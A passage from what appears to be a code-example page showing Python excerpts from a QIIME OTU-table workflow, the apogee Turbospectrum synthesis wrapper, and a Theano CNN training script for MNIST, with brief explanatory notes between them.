                new_refseqs_f.write('>%s\n%s\n' % (otu_id, seq))
                final_repset_f.write('>%s\n%s\n' % (otu_id, seq))
    new_refseqs_f.close()
    final_repset_f.close()

    # steps 1-4 executed
    if run_step_2_and_3:
        logger.write('# Write non-singleton otus representative sequences from ' +
                     'step 2 and step 4 to the final representative set and the new reference' +
                     ' set (%s and %s respectively)\n\n' % (final_repset_fp, new_refseqs_fp))
    # only steps 1 and 4 executed
    else:
        logger.write('# Write non-singleton otus representative sequences from ' +
                     'step 4 to the final representative set and the new reference' +
                     ' set (%s and %s respectively)\n\n' % (final_repset_fp, new_refseqs_fp))

    # Prep the make_otu_table.py command
    otu_table_fp = '%s/otu_table_mc%d.biom' % (output_dir, min_otu_size)

    make_otu_table_cmd = 'make_otu_table.py -i %s -o %s' %\
        (otu_no_singletons_fp, otu_table_fp)
    commands.append([("Make the otu table", make_otu_table_cmd)])
    index_links.append(
        ('OTU table excluding OTUs with fewer than %d sequences' % min_otu_size,
         otu_table_fp,
         _index_headers['otu_tables']))
    command_handler(commands,
                    status_update_callback,
                    logger=logger,
                    close_logger_on_success=False)

    commands = []

    # initialize output file names - these differ based on what combination of
    # taxonomy assignment and alignment/tree building is happening.
    if run_assign_tax and run_align_and_tree:
        tax_input_otu_table_fp = otu_table_fp
        otu_table_w_tax_fp = \
            '%s/otu_table_mc%d_w_tax.biom' % (output_dir, min_otu_size)

        align_and_tree_input_otu_table = otu_table_w_tax_fp
        index_links.append(
            ('OTU table excluding OTUs with fewer than %d sequences and including OTU '
             'taxonomy assignments' % min_otu_size,
             otu_table_w_tax_fp,
             _index_headers['otu_tables']))

        pynast_failure_filtered_otu_table_fp = \
            '%s/otu_table_mc%d_w_tax_no_pynast_failures.biom' % (output_dir, min_otu_size)
        index_links.append(
            ('OTU table excluding OTUs with fewer than %d sequences and sequences that '
            'fail to align with PyNAST and including OTU taxonomy assignments' % min_otu_size,
             pynast_failure_filtered_otu_table_fp,
             _index_headers['otu_tables']))

    elif run_assign_tax:
        tax_input_otu_table_fp = otu_table_fp
        otu_table_w_tax_fp = \
            '%s/otu_table_mc%d_w_tax.biom' % (output_dir, min_otu_size)
        index_links.append(
            ('OTU table excluding OTUs with fewer than %d sequences and including OTU '
            'taxonomy assignments' % min_otu_size,
             otu_table_w_tax_fp,
             _index_headers['otu_tables']))

    elif run_align_and_tree:
        align_and_tree_input_otu_table = otu_table_fp
        pynast_failure_filtered_otu_table_fp = \
            '%s/otu_table_mc%d_no_pynast_failures.biom' % (output_dir,
                                                           min_otu_size)
        index_links.append(
            ('OTU table excluding OTUs with fewer than %d sequences and sequences that '
             'fail to align with PyNAST' % min_otu_size,
             pynast_failure_filtered_otu_table_fp,
             _index_headers['otu_tables']))

    if run_assign_tax:
        if exists(otu_table_w_tax_fp) and getsize(otu_table_w_tax_fp) > 0:
            logger.write(
                "Final output file exists (%s). Will not rebuild." %
                otu_table_w_tax_fp)
        else:
            # remove files from partially completed runs
            remove_files([otu_table_w_tax_fp], error_on_missing=False)

            taxonomy_fp = assign_tax(
                repset_fasta_fp=final_repset_fp,
                output_dir=output_dir,
                command_handler=command_handler,
                params=params,
                qiime_config=qiime_config,
                parallel=parallel,
                logger=logger,
                status_update_callback=status_update_callback)

            index_links.append(
                ('OTU taxonomic assignments',
                 taxonomy_fp,
                 _index_headers['taxa_assignments']))

            # Add taxa to otu table
            add_metadata_cmd = 'biom add-metadata -i %s --observation-metadata-fp %s -o %s --sc-separated taxonomy --observation-header OTUID,taxonomy' %\
                (tax_input_otu_table_fp, taxonomy_fp, otu_table_w_tax_fp)
            commands.append([("Add taxa to OTU table", add_metadata_cmd)])

            command_handler(commands,
                            status_update_callback,
                            logger=logger,
                            close_logger_on_success=False)
            commands = []

    if run_align_and_tree:
        rep_set_tree_fp = join(output_dir, 'rep_set.tre')
        index_links.append(
            ('OTU phylogenetic tree',
             rep_set_tree_fp,
             _index_headers['trees']))
        if exists(pynast_failure_filtered_otu_table_fp) and\
           getsize(pynast_failure_filtered_otu_table_fp) > 0:
            logger.write("Final output file exists (%s). Will not rebuild." %
                         pynast_failure_filtered_otu_table_fp)
        else:
            # remove files from partially completed runs
            remove_files([pynast_failure_filtered_otu_table_fp],
                         error_on_missing=False)

            pynast_failures_fp = align_and_tree(
                repset_fasta_fp=final_repset_fp,
                output_dir=output_dir,
                command_handler=command_handler,
                params=params,
                qiime_config=qiime_config,
                parallel=parallel,
                logger=logger,
                status_update_callback=status_update_callback)

            # Build OTU table without PyNAST failures
            table = load_table(align_and_tree_input_otu_table)
            filtered_otu_table = filter_otus_from_otu_table(table,
                get_seq_ids_from_fasta_file(open(pynast_failures_fp, 'U')),
                0, inf, 0, inf, negate_ids_to_keep=True)
            write_biom_table(filtered_otu_table,
                             pynast_failure_filtered_otu_table_fp)

            command_handler(commands,
                            status_update_callback,
                            logger=logger,
                            close_logger_on_success=False)
            commands = []


    if close_logger_on_success:
        logger.close()

    if not suppress_index_page:
        index_fp = '%s/index.html' % output_dir
        generate_index_page(index_links, index_fp)
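
A pattern worth noting in the workflow above is the resume guard used before the taxonomy and tree-building steps: a final output is rebuilt only if it does not already exist or is empty. Below is a minimal, hedged sketch of that pattern on its own; the file name 'final_output.biom' and the rebuild_output callable are hypothetical placeholders, not part of the workflow above.

# Minimal sketch of the "skip if already built" guard used in the workflow
# above; 'final_output.biom' and rebuild_output() are hypothetical.
import os
from os.path import exists, getsize

def build_if_missing(output_fp, build_fn):
    # Skip the expensive step when a non-empty result is already on disk.
    if exists(output_fp) and getsize(output_fp) > 0:
        print("Final output file exists (%s). Will not rebuild." % output_fp)
        return
    # Remove a zero-byte leftover from a partially completed run, if any.
    if exists(output_fp):
        os.remove(output_fp)
    build_fn()

# Usage (hypothetical): build_if_missing('final_output.biom', rebuild_output)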

Example 146

Project: apogee
Source File: turbospec.py
View license
def turbosynth(*args,**kwargs):
    """
    NAME:
       turbosynth
    PURPOSE:
       Run a Turbospectrum synthesis (direct interface to the Turbospectrum code; use 'synth' for a general routine that generates the non-continuum-normalized spectrum, convolves with the LSF and macroturbulence, and optionally continuum-normalizes the output)
    INPUT ARGUMENTS:
       lists with abundances:
          [Atomic number1,diff1]
          [Atomic number2,diff2]
          ...
          [Atomic numberM,diffM]
    SYNTHESIS KEYWORDS:
       isotopes= ('solar') use 'solar' or 'arcturus' isotope ratios; can also be a dictionary with isotope ratios (e.g., isotopes= {'6.012':'0.9375','6.013':'0.0625'})
       wmin, wmax, dw, width= (15000.000, 17000.000, 0.10000000) spectral synthesis limits and step of calculation (see MOOG)
       babsma_wmin, babsma_wmax= (wmin,wmax) allows opacity limits to be different (broader) than for the synthesis itself
       costheta= (1.) cosine of the viewing angle
    LINELIST KEYWORDS:
          air= (True) if True, perform the synthesis in air wavelengths (affects the default Hlinelist, nothing else; output is in air if air, vacuum otherwise); set to False at your own risk, as Turbospectrum expects the linelist in air wavelengths!
          Hlinelist= (None) Hydrogen linelists to use; can be set to the path of a linelist file or to the name of an APOGEE linelist; if None, then we first search for the Hlinedata.vac in the APOGEE linelist directory (if air=False) or we use the internal Turbospectrum Hlinelist (if air=True)
       linelist= (None) molecular and atomic linelists to use; can be set to the path of a linelist file or to the name of an APOGEE linelist, or lists of such files; if a single filename is given, the code will first search for files with extensions '.atoms', '.molec' or that start with 'turboatoms.' and 'turbomolec.'
    ATMOSPHERE KEYWORDS:
       modelatm= (None) model-atmosphere instance
       vmicro= (2.) microturbulence (km/s)
       modelopac= (None) 
                  (a) if set to an existing filename: assume babsma_lu has already been run and use this continuous opacity in bsyn_lu
                  (b) if set to a non-existing filename: store the continuous opacity in this file
    MISCELLANEOUS KEYWORDS:
       dr= data release
       saveTurboInput= if set to a string, the input to and output from Turbospectrum will be saved as a tar.gz file with this name; can be a filename in the current directory or a full path
    OUTPUT:
       (wavelengths,cont-norm. spectrum, spectrum (nwave))
    HISTORY:
       2015-04-13 - Written - Bovy (IAS)
    """
    # Get the spectral synthesis limits
    wmin= kwargs.pop('wmin',_WMIN_DEFAULT)
    wmax= kwargs.pop('wmax',_WMAX_DEFAULT)
    dw= kwargs.pop('dw',_DW_DEFAULT)
    babsma_wmin= kwargs.pop('babsma_wmin',wmin)
    babsma_wmax= kwargs.pop('babsma_wmax',wmax)
    if babsma_wmin > wmin or babsma_wmax < wmax:
        raise ValueError("Opacity wavelength range must encompass the synthesis range")
    if int(numpy.ceil((wmax-wmin)/dw)) > 150000:
        raise ValueError('Too many wavelengths for Turbospectrum synthesis, reduce the wavelength step dw (to, e.g., 0.016)')
    costheta= kwargs.pop('costheta',1.)
    # Linelists
    Hlinelist= kwargs.pop('Hlinelist',None)
    linelist= kwargs.pop('linelist',None)
    # Parse isotopes
    isotopes= kwargs.pop('isotopes','solar')
    if isinstance(isotopes,str) and isotopes.lower() == 'solar':
        isotopes= {}
    elif isinstance(isotopes,str) and isotopes.lower() == 'arcturus':
        isotopes= {'6.012':'0.9375',
                   '6.013':'0.0625'}
    elif not isinstance(isotopes,dict):
        raise ValueError("'isotopes=' input not understood, should be 'solar', 'arcturus', or a dictionary")
    # We will run in a subdirectory of the current directory
    tmpDir= tempfile.mkdtemp(dir=os.getcwd())
    # Get the model atmosphere
    modelatm= kwargs.pop('modelatm',None)
    if not modelatm is None:
        if isinstance(modelatm,str) and os.path.exists(modelatm):
            raise ValueError('modelatm= input is an existing filename, but you need to give an Atmosphere object instead')
        elif isinstance(modelatm,str):
            raise ValueError('modelatm= input needs to be an Atmosphere instance')
        else:
            # Check temperature
            if modelatm._teff > 7000.:
                warnings.warn('Turbospectrum does not include all necessary physics to model stars hotter than about 7000 K; proceed with caution',RuntimeWarning)
            # Write atmosphere to file
            modelfilename= os.path.join(tmpDir,'atm.mod')
            modelatm.writeto(modelfilename,turbo=True)
    modeldirname= os.path.dirname(modelfilename)
    modelbasename= os.path.basename(modelfilename)
    # Get the name of the linelists
    if Hlinelist is None:
        if kwargs.get('air',True):
            Hlinelist= 'DATA/Hlinedata' # will be symlinked
        else:
            Hlinelist= appath.linelistPath('Hlinedata.vac',
                                           dr=kwargs.get('dr',None))
    if not os.path.exists(Hlinelist) and not Hlinelist == 'DATA/Hlinedata':
        Hlinelist= appath.linelistPath(Hlinelist,
                                       dr=kwargs.get('dr',None))
    if not os.path.exists(Hlinelist) and not kwargs.get('air',True):
        print("Hlinelist in vacuum linelist not found, using Turbospectrum's, which is in air...")
        Hlinelist= 'DATA/Hlinedata' # will be symlinked
    linelistfilenames= [Hlinelist]
    if isinstance(linelist,str):
        if os.path.exists(linelist):
            linelistfilenames.append(linelist)
        else:
            # Try finding the linelist
            atomlinelistfilename= appath.linelistPath(\
                '%s.atoms' % linelist,
                dr=kwargs.get('dr',None))
            moleclinelistfilename= appath.linelistPath(\
                '%s.molec' % linelist,
                dr=kwargs.get('dr',None))
            if os.path.exists(atomlinelistfilename) \
                    and os.path.exists(moleclinelistfilename):
                linelistfilenames.append(atomlinelistfilename)
                linelistfilenames.append(moleclinelistfilename)
            else:
                atomlinelistfilename= appath.linelistPath(\
                    'turboatoms.%s' % linelist,
                    dr=kwargs.get('dr',None))
                moleclinelistfilename= appath.linelistPath(\
                    'turbomolec.%s' % linelist,
                    dr=kwargs.get('dr',None))
                if not os.path.exists(atomlinelistfilename) \
                        and '201404080919' in atomlinelistfilename \
                        and kwargs.get('air',True):
                    download.linelist(os.path.basename(atomlinelistfilename),
                                      dr=kwargs.get('dr',None))
                if not os.path.exists(moleclinelistfilename) \
                        and '201404080919' in moleclinelistfilename \
                        and kwargs.get('air',True):
                    download.linelist(os.path.basename(moleclinelistfilename),
                                      dr=kwargs.get('dr',None))
                if os.path.exists(atomlinelistfilename) \
                        and os.path.exists(moleclinelistfilename):
                    linelistfilenames.append(atomlinelistfilename)
                    linelistfilenames.append(moleclinelistfilename)
    if linelist is None or len(linelistfilenames) == 1:
        os.remove(modelfilename)
        os.rmdir(tmpDir)
        raise ValueError('linelist= must be set (see documentation) and given linelist must exist (either as absolute path or in the linelist directory)')
    # Link the Turbospectrum DATA directory
    os.symlink(os.getenv('TURBODATA'),os.path.join(tmpDir,'DATA'))
    # Cut the linelist to the desired wavelength range, if necessary,
    # Skipped because it is unnecessary, but left in case we still want to 
    # use it
    rmLinelists= False
    for ll, linelistfilename in enumerate(linelistfilenames[1:]):
        if not _CUTLINELIST: continue #SKIP
        if wmin == _WMIN_DEFAULT and wmax == _WMAX_DEFAULT: continue
        rmLinelists= True
        with open(os.path.join(tmpDir,'cutlines.awk'),'w') as awkfile:
            awkfile.write('($1>%.3f && $1<%.3f) || ( substr($1,1,1) == "' 
                          %(wmin-7.,wmax+7.) +"'"+'")\n')
        keeplines= open(os.path.join(tmpDir,'lines.tmp'),'w')
        stderr= open('/dev/null','w')
        try:
            subprocess.check_call(['awk','-f','cutlines.awk',
                                   linelistfilename],
                                  cwd=tmpDir,stdout=keeplines,stderr=stderr)
            keeplines.close()
        except subprocess.CalledProcessError:
            os.remove(os.path.join(tmpDir,'lines.tmp'))
            os.remove(os.path.join(tmpDir,'DATA'))
            raise RuntimeError("Removing unnecessary linelist entries failed ...")
        finally:
            os.remove(os.path.join(tmpDir,'cutlines.awk'))
            stderr.close()
        # Remove elements that aren't used altogether, adjust nlines
        with open(os.path.join(tmpDir,'lines.tmp'),'r') as infile:
            lines= infile.readlines()
        nl_list= [l[0] == "'" for l in lines]
        nl= numpy.array(nl_list,dtype='int')
        nl_list.append(True)
        nl_list.append(True)
        nlines= [numpy.sum(1-nl[ii:nl_list[ii+2:].index(True)+ii+2]) 
                 for ii in range(len(nl))]
        with open(os.path.join(tmpDir,os.path.basename(linelistfilename)),
                  'w') \
                as outfile:
            for ii, line in enumerate(lines):
                if ii < len(lines)-2:
                    if not lines[ii][0] == "'":
                        outfile.write(lines[ii])
                    elif not (lines[ii+2][0] == "'" and lines[ii+1][0] == "'"):
                        if lines[ii+1][0] == "'":
                            # Adjust nlines                       
                            outfile.write(lines[ii].replace(lines[ii].split()[-1]+'\n',
                                                            '%i\n' % nlines[ii]))
                        else:
                            outfile.write(lines[ii])
                else:
                    if not lines[ii][0] == "'": outfile.write(lines[ii])
        os.remove(os.path.join(tmpDir,'lines.tmp'))
        # cp the linelists to the temporary directory
        shutil.copy(linelistfilename,tmpDir)
        linelistfilenames[ll]= os.path.basename(linelistfilename)
    # Parse the abundances
    if len(args) == 0: #special case that there are *no* differences
        args= ([26,0.],)
    indiv_abu= {}
    for arg in args:
        indiv_abu[arg[0]]= arg[1]+solarabundances._ASPLUND05[arg[0]]\
            +modelatm._metals
        if arg[0] == 6: indiv_abu[arg[0]]+= modelatm._cm
        if arg[0] in [8,10,12,14,16,18,20,22]: indiv_abu[arg[0]]+= modelatm._am
    modelopac= kwargs.get('modelopac',None)
    if modelopac is None or \
            (isinstance(modelopac,str) and not os.path.exists(modelopac)):
        # Now write the script file for babsma_lu
        scriptfilename= os.path.join(tmpDir,'babsma.par')
        modelopacname= os.path.join(tmpDir,'mopac')
        _write_script(scriptfilename,
                      babsma_wmin,babsma_wmax,dw,
                      None,
                      modelfilename,
                      None,
                      modelopacname,
                      modelatm._metals,
                      modelatm._am,
                      indiv_abu,
                      kwargs.get('vmicro',2.),
                      None,None,None,bsyn=False)
        # Run babsma
        sys.stdout.write('\r'+"Running Turbospectrum babsma_lu ...\r")
        sys.stdout.flush()
        if kwargs.get('verbose',False):
            stdout= None
            stderr= None
        else:
            stdout= open('/dev/null', 'w')
            stderr= subprocess.STDOUT
        try:
            p= subprocess.Popen(['babsma_lu'],
                                cwd=tmpDir,
                                stdin=subprocess.PIPE,
                                stdout=stdout,
                                stderr=stderr)
            with open(os.path.join(tmpDir,'babsma.par'),'r') as parfile:
                for line in parfile:
                    p.stdin.write(line.encode('utf-8'))
            stdout, stderr= p.communicate()
        except subprocess.CalledProcessError:
            for linelistfilename in linelistfilenames:
                os.remove(linelistfilename,tmpDir)
            if os.path.exists(os.path.join(tmpDir,'DATA')):
                os.remove(os.path.join(tmpDir,'DATA'))
            raise RuntimeError("Running babsma_lu failed ...")
        finally:
            if os.path.exists(os.path.join(tmpDir,'babsma.par')) \
                    and not 'saveTurboInput' in kwargs:
                os.remove(os.path.join(tmpDir,'babsma.par'))
            sys.stdout.write('\r'+download._ERASESTR+'\r')
            sys.stdout.flush()
        if isinstance(modelopac,str):
            shutil.copy(modelopacname,modelopac)
    else:
        shutil.copy(modelopac,tmpDir)
        modelopacname= os.path.join(tmpDir,os.path.basename(modelopac))
    # Now write the script file for bsyn_lu
    scriptfilename= os.path.join(tmpDir,'bsyn.par')
    outfilename= os.path.join(tmpDir,'bsyn.out')
    _write_script(scriptfilename,
                  wmin,wmax,dw,
                  costheta,
                  modelfilename,
                  None,
                  modelopacname,
                  modelatm._metals,
                  modelatm._am,
                  indiv_abu,
                  None,
                  outfilename,
                  isotopes,
                  linelistfilenames,
                  bsyn=True)
    # Run bsyn
    sys.stdout.write('\r'+"Running Turbospectrum bsyn_lu ...\r")
    sys.stdout.flush()
    if kwargs.get('verbose',False):
        stdout= None
        stderr= None
    else:
        stdout= open('/dev/null', 'w')
        stderr= subprocess.STDOUT
    try:
        p= subprocess.Popen(['bsyn_lu'],
                            cwd=tmpDir,
                            stdin=subprocess.PIPE,
                            stdout=stdout,
                            stderr=stderr)
        with open(os.path.join(tmpDir,'bsyn.par'),'r') as parfile:
            for line in parfile:
                p.stdin.write(line.encode('utf-8'))
        stdout, stderr= p.communicate()
    except subprocess.CalledProcessError:
        raise RuntimeError("Running bsyn_lu failed ...")
    finally:
        if 'saveTurboInput' in kwargs:
            turbosavefilename= kwargs['saveTurboInput']
            if os.path.dirname(turbosavefilename) == '':
                turbosavefilename= os.path.join(os.getcwd(),turbosavefilename)
            try:
                subprocess.check_call(['tar','cvzf',turbosavefilename,
                                       os.path.basename(os.path.normpath(tmpDir))])
            except subprocess.CalledProcessError:
                raise RuntimeError("Tar-zipping the Turbospectrum input and output failed; you will have to manually delete the temporary directory ...")
            # Need to remove babsma.par, bc not removed above
            if os.path.exists(os.path.join(tmpDir,'babsma.par')):
                os.remove(os.path.join(tmpDir,'babsma.par'))
        if os.path.exists(os.path.join(tmpDir,'bsyn.par')):
            os.remove(os.path.join(tmpDir,'bsyn.par'))
        if os.path.exists(modelopacname):
            os.remove(modelopacname)
        if os.path.exists(modelopacname+'.mod'):
            os.remove(modelopacname+'.mod')
        if os.path.exists(os.path.join(tmpDir,'DATA')):
            os.remove(os.path.join(tmpDir,'DATA'))
        if os.path.exists(os.path.join(tmpDir,'dummy-output.dat')):
            os.remove(os.path.join(tmpDir,'dummy-output.dat'))
        if os.path.exists(modelfilename):
            os.remove(modelfilename)
        if rmLinelists:
            for linelistfilename in linelistfilenames[1:]:
                os.remove(linelistfilename)
        sys.stdout.write('\r'+download._ERASESTR+'\r')
        sys.stdout.flush()
    # Now read the output
    turboOut= numpy.loadtxt(outfilename)
    # Clean up
    os.remove(outfilename)
    os.rmdir(tmpDir)
    # Return wav, cont-norm, full spectrum
    return (turboOut[:,0],turboOut[:,1],turboOut[:,2])
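
Based only on the docstring above, a call to turbosynth might look like the sketch below. The Atmosphere instance atm and the linelist name 'my_linelist' are placeholders (assumptions), not values taken from the APOGEE code, and the snippet presumes turbosynth has been imported from the apogee package's turbospec module and that Turbospectrum itself is installed.

# Hedged usage sketch for turbosynth(); 'atm' must already be an
# Atmosphere instance and 'my_linelist' an existing linelist name or
# path. Both are hypothetical here.
wav, cont_norm_spec, spec = turbosynth([26, 0.3], [12, -0.1],
                                       modelatm=atm,
                                       linelist='my_linelist',
                                       wmin=15000., wmax=15100., dw=0.05,
                                       vmicro=2.,
                                       isotopes='arcturus')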

Example 147

Project: mmdgm
Source File: cnn_6layer_mnist_50000.py
View license
def deep_cnn_6layer_mnist_50000(learning_rate=3e-4,
            n_epochs=250,
            dataset='mnist.pkl.gz',
            batch_size=500,
            dropout_flag=0,
            seed=0,
            activation=None):
    
    #cp->cd->cpd->cd->c
    nkerns=[32, 32, 64, 64, 64]
    drops=[1, 0, 1, 0, 0]
    #skerns=[5, 3, 3, 3, 3]
    #pools=[2, 1, 1, 2, 1]
    #modes=['same']*5
    n_hidden=[500]

    
    logdir = 'results/supervised/cnn/mnist/deep_cnn_6layer_50000_'+str(nkerns)+str(drops)+str(n_hidden)+'_'+str(learning_rate)+'_'+str(int(time.time()))+'/'
    if dropout_flag==1:
        logdir = 'results/supervised/cnn/mnist/deep_cnn_6layer_50000_'+str(nkerns)+str(drops)+str(n_hidden)+'_'+str(learning_rate)+'_dropout_'+str(int(time.time()))+'/'
    if not os.path.exists(logdir): os.makedirs(logdir)
    print 'logdir:', logdir
    print 'deep_cnn_6layer_mnist_50000_', nkerns, n_hidden, drops, seed, dropout_flag
    with open(logdir+'hook.txt', 'a') as f:
        print >>f, 'logdir:', logdir
        print >>f, 'deep_cnn_6layer_mnist_50000_', nkerns, n_hidden, drops, seed, dropout_flag

    rng = np.random.RandomState(0)
    rng_share = theano.tensor.shared_randomstreams.RandomStreams(0)
    '''
    '''
    datasets = datapy.load_data_gpu_60000(dataset, have_matrix=True)

    train_set_x, train_set_y, train_y_matrix = datasets[0]
    valid_set_x, valid_set_y, valid_y_matrix = datasets[1]
    test_set_x, test_set_y, test_y_matrix = datasets[2]

    # compute number of minibatches for training, validation and testing
    n_train_batches = train_set_x.get_value(borrow=True).shape[0]
    n_valid_batches = valid_set_x.get_value(borrow=True).shape[0]
    n_test_batches = test_set_x.get_value(borrow=True).shape[0]
    n_train_batches /= batch_size
    n_valid_batches /= batch_size
    n_test_batches /= batch_size

    # allocate symbolic variables for the data
    index = T.lscalar()  # index to a [mini]batch

    # start-snippet-1
    x = T.matrix('x')   # the data is presented as rasterized images
    y = T.ivector('y')  # the labels are presented as 1D vector of
                        # [int] labels
    '''
    dropout
    '''
    drop = T.iscalar('drop')

    y_matrix = T.imatrix('y_matrix') # labels, presented as 2D matrix of int labels 

    print '... building the model'

    layer0_input = x.reshape((batch_size, 1, 28, 28))
    
    if activation =='nonlinearity.relu':
        activation = nonlinearity.relu
    elif activation =='nonlinearity.tanh':
        activation = nonlinearity.tanh
    elif activation =='nonlinearity.softplus':
        activation = nonlinearity.softplus
    
    recg_layer = []
    cnn_output = []

    #1
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, 1, 28, 28),
        filter_shape=(nkerns[0], 1, 5, 5),
        poolsize=(2, 2),
        border_mode='valid', 
        activation=activation
    ))
    if drops[0]==1:
        cnn_output.append(recg_layer[-1].drop_output(layer0_input, drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(layer0_input))

    #2
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[0], 12, 12),
        filter_shape=(nkerns[1], nkerns[0], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[1]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))
    #3
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[1], 12, 12),
        filter_shape=(nkerns[2], nkerns[1], 3, 3),
        poolsize=(2, 2),
        border_mode='valid', 
        activation=activation
    ))
    if drops[2]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))

    #4
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[2], 5, 5),
        filter_shape=(nkerns[3], nkerns[2], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[3]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))
    #5
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[3], 5, 5),
        filter_shape=(nkerns[4], nkerns[3], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[4]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))

    mlp_input = cnn_output[-1].flatten(2)

    recg_layer.append(FullyConnected.FullyConnected(
        rng=rng,
        n_in=nkerns[4] * 5 * 5,
        n_out=500,
        activation=activation
    ))

    feature = recg_layer[-1].drop_output(mlp_input, drop=drop, rng=rng_share)

    # classify the values of the fully-connected sigmoidal layer
    classifier = Pegasos.Pegasos(input=feature, rng=rng, n_in=500, n_out=10, weight_decay=0, loss=1)

    # the cost we minimize during training is the NLL of the model
    cost = classifier.hinge_loss(10, y, y_matrix) * batch_size
    weight_decay=1.0/n_train_batches

    # create a list of all model parameters to be fit by gradient descent
    params=[]
    for r in recg_layer:
        params+=r.params
    params += classifier.params

    # create a list of gradients for all model parameters
    grads = T.grad(cost, params)
    l_r = theano.shared(np.asarray(learning_rate, dtype=np.float32))
    get_optimizer = optimizer.get_adam_optimizer_min(learning_rate=l_r, decay1 = 0.1, decay2 = 0.001, weight_decay=weight_decay)
    updates = get_optimizer(params,grads)

    '''
    Save parameters and activations
    '''

    parameters = theano.function(
        inputs=[],
        outputs=params,
    )

    # create a function to compute the mistakes that are made by the model
    test_model = theano.function(
        inputs=[index],
        outputs=classifier.errors(y),
        givens={
            x: test_set_x[index * batch_size: (index + 1) * batch_size],
            y: test_set_y[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0)
        }
    )

    validate_model = theano.function(
        inputs=[index],
        outputs=classifier.errors(y),
        givens={
            x: valid_set_x[index * batch_size: (index + 1) * batch_size],
            y: valid_set_y[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0)
        }
    )

    train_model_average = theano.function(
        inputs=[index],
        outputs=[cost, classifier.errors(y)],
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            y: train_set_y[index * batch_size: (index + 1) * batch_size],
            y_matrix: train_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](dropout_flag)
        }
    )

    train_model = theano.function(
        inputs=[index],
        outputs=[cost, classifier.errors(y)],
        updates=updates,
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            y: train_set_y[index * batch_size: (index + 1) * batch_size],
            y_matrix: train_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](dropout_flag)
        }
    )

    print '... training'
    # early-stopping parameters
    patience = n_train_batches * 100  # look at this many examples regardless
    patience_increase = 2  # wait this much longer when a new best is
                           # found
    improvement_threshold = 0.995  # a relative improvement of this much is
                                   # considered significant
    validation_frequency = min(n_train_batches, patience / 2)
                                  # go through this many
                                  # minibatches before checking the network
                                  # on the validation set; in this case we
                                  # check every epoch

    best_validation_loss = np.inf
    best_test_score = np.inf
    test_score = 0.
    start_time = time.clock()
    epoch = 0
    decay_epochs = 150

    while (epoch < n_epochs):
        epoch = epoch + 1
        tmp1 = time.clock()

        minibatch_avg_cost = 0
        train_error = 0

        for minibatch_index in xrange(n_train_batches):

            co, te = train_model(minibatch_index)
            minibatch_avg_cost+=co
            train_error+=te
            #print minibatch_avg_cost
            # iteration number
            iter = (epoch - 1) * n_train_batches + minibatch_index

            if (iter + 1) % validation_frequency == 0:

                test_epoch = epoch - decay_epochs
                if test_epoch > 0 and test_epoch % 10 == 0:
                    print l_r.get_value()
                    with open(logdir+'hook.txt', 'a') as f:
                        print >>f,l_r.get_value()
                    l_r.set_value(np.cast['float32'](l_r.get_value()/3.0))

                # compute zero-one loss on validation set
                validation_losses = [validate_model(i)
                                     for i in xrange(n_valid_batches)]
                this_validation_loss = np.mean(validation_losses)

                this_test_losses = [test_model(i)
                                   for i in xrange(n_test_batches)]
                this_test_score = np.mean(this_test_losses)

                train_thing = [train_model_average(i) for i in xrange(n_train_batches)]
                train_thing = np.mean(train_thing, axis=0)
                        
                print epoch, 'hinge loss and training error', train_thing
                with open(logdir+'hook.txt', 'a') as f:
                    print >>f, epoch, 'hinge loss and training error', train_thing

                if this_test_score < best_test_score:
                    best_test_score = this_test_score

                print(
                    'epoch %i, minibatch %i/%i, validation error %f %%, test error %f %%' %
                    (
                        epoch,
                        minibatch_index + 1,
                        n_train_batches,
                        this_validation_loss * 100,
                        this_test_score *100.
                    )
                )
                with open(logdir+'hook.txt', 'a') as f:
                    print >>f, (
                        'epoch %i, minibatch %i/%i, validation error %f %%, test error %f %%' %
                        (
                            epoch,
                            minibatch_index + 1,
                            n_train_batches,
                            this_validation_loss * 100,
                            this_test_score *100.
                        )
                    )

                # if we got the best validation score until now
                if this_validation_loss < best_validation_loss:
                    #improve patience if loss improvement is good enough
                    if this_validation_loss < best_validation_loss *  \
                       improvement_threshold:
                        patience = max(patience, iter * patience_increase)

                    best_validation_loss = this_validation_loss
                    # test it on the test set

                    test_losses = [test_model(i)
                                   for i in xrange(n_test_batches)]
                    test_score = np.mean(test_losses)

                    print(
                        (
                            '     epoch %i, minibatch %i/%i, test error of'
                            ' best model %f %%'
                        ) %
                        (
                            epoch,
                            minibatch_index + 1,
                            n_train_batches,
                            test_score * 100.
                        )
                    )
                    with open(logdir+'hook.txt', 'a') as f:
                        print >>f, (
                            (
                                '     epoch %i, minibatch %i/%i, test error of'
                                ' best model %f %%'
                            ) %
                            (
                                epoch,
                                minibatch_index + 1,
                                n_train_batches,
                                test_score * 100.
                            )
                        )
        
        if epoch%50==0:
            model = parameters()
            for i in xrange(len(model)):
